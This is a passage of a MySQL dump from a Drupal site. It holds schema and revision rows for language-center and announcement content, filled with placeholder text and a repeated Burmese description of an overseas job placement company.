('language_center', 0, 205, 717, 'ja', 0, '<p>.path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a&nbsp;</p>', '', 'basic_html'),
('language_center', 0, 205, 718, 'ja', 0, '<p>.path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a&nbsp;</p>', '', 'basic_html'),
('language_center', 0, 205, 721, 'ja', 0, '<p>.path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a&nbsp;</p>', '', 'basic_html'),
('language_center', 0, 206, 722, 'ja', 0, '<p>sdfsdf sfdsdf sdf sdf sdfsdfs fdsdf&nbsp;</p>', '', 'full_html'),
('language_center', 0, 206, 723, 'ja', 0, '<p>sdfsdf sfdsdf sdf sdf sdfsdfs fdsdf&nbsp;</p>', '', 'full_html');

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_center_download_file`
--

CREATE TABLE `node_revision__field_center_download_file` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_center_download_file_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_center_download_file_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_center_download_file_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='Revision archive storage for node field field_center…';

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_center_img`
--

CREATE TABLE `node_revision__field_center_img` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_center_img_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_center_img_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_center_img_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_center_img_width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_center_img_height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='Revision archive storage for node field field_center_img.';

--
-- Dumping data for table `node_revision__field_center_img`
--

INSERT INTO `node_revision__field_center_img` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_center_img_target_id`, `field_center_img_alt`, `field_center_img_title`, `field_center_img_width`, `field_center_img_height`) VALUES
('language_center', 0, 204, 716, 'ja', 0, 879, '', '', 1200, 715),
('language_center', 0, 204, 719, 'ja', 0, 879, '', '', 1200, 715),
('language_center', 0, 204, 720, 'ja', 0, 879, '', '', 1200, 715),
('language_center', 0, 205, 717, 'ja', 0, 880, '', '', 1200, 715),
('language_center', 0, 205, 718, 'ja', 0, 880, '', '', 1200, 715),
('language_center', 0, 205, 721, 'ja', 0, 880, '', '', 1200, 715),
('language_center', 0, 206, 723, 'ja', 0, 881, '', '', 1200, 715);

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_center_post_date`
--

CREATE TABLE `node_revision__field_center_post_date` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_center_post_date_value` varchar(20) NOT NULL COMMENT 'The date value.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='Revision archive storage for node field field_center_post…';

--
-- Dumping data for table `node_revision__field_center_post_date`
--

INSERT INTO `node_revision__field_center_post_date` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_center_post_date_value`) VALUES
('language_center', 0, 204, 715, 'ja', 0, '2026-08-26T13:34:17'),
('language_center', 0, 204, 716, 'ja', 0, '2026-08-26T13:34:17'),
('language_center', 0, 204, 719, 'ja', 0, '2026-08-26T13:34:17'),
('language_center', 0, 204, 720, 'ja', 0, '2026-08-26T13:34:17'),
('language_center', 0, 205, 717, 'ja', 0, '2026-08-25T13:53:05'),
('language_center', 0, 205, 718, 'ja', 0, '2026-08-25T13:53:05'),
('language_center', 0, 205, 721, 'ja', 0, '2026-08-25T13:53:05'),
('language_center', 0, 206, 722, 'ja', 0, '2026-08-28T13:53:47'),
('language_center', 0, 206, 723, 'ja', 0, '2026-08-28T13:53:47');

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_description`
--

CREATE TABLE `node_revision__field_description` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_description_value` longtext NOT NULL,
  `field_description_format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field field_description.';

--
-- Dumping data for table `node_revision__field_description`
--

INSERT INTO `node_revision__field_description` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_description_value`, `field_description_format`) VALUES
('announcement', 0, 3, 6, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', 'full_html'),
('announcement', 0, 3, 9, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', 'full_html'),
('announcement', 0, 4, 7, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', 'full_html'),
('announcement', 0, 4, 8, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', 'full_html'),
('announcement', 0, 5, 10, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', 'full_html'),
('announcement', 0, 5, 22, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။&nbsp;</p><p>&nbsp;</p>', 'full_html'),
('announcement', 0, 5, 25, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။&nbsp;</p><p>&nbsp;</p>', 'full_html'),
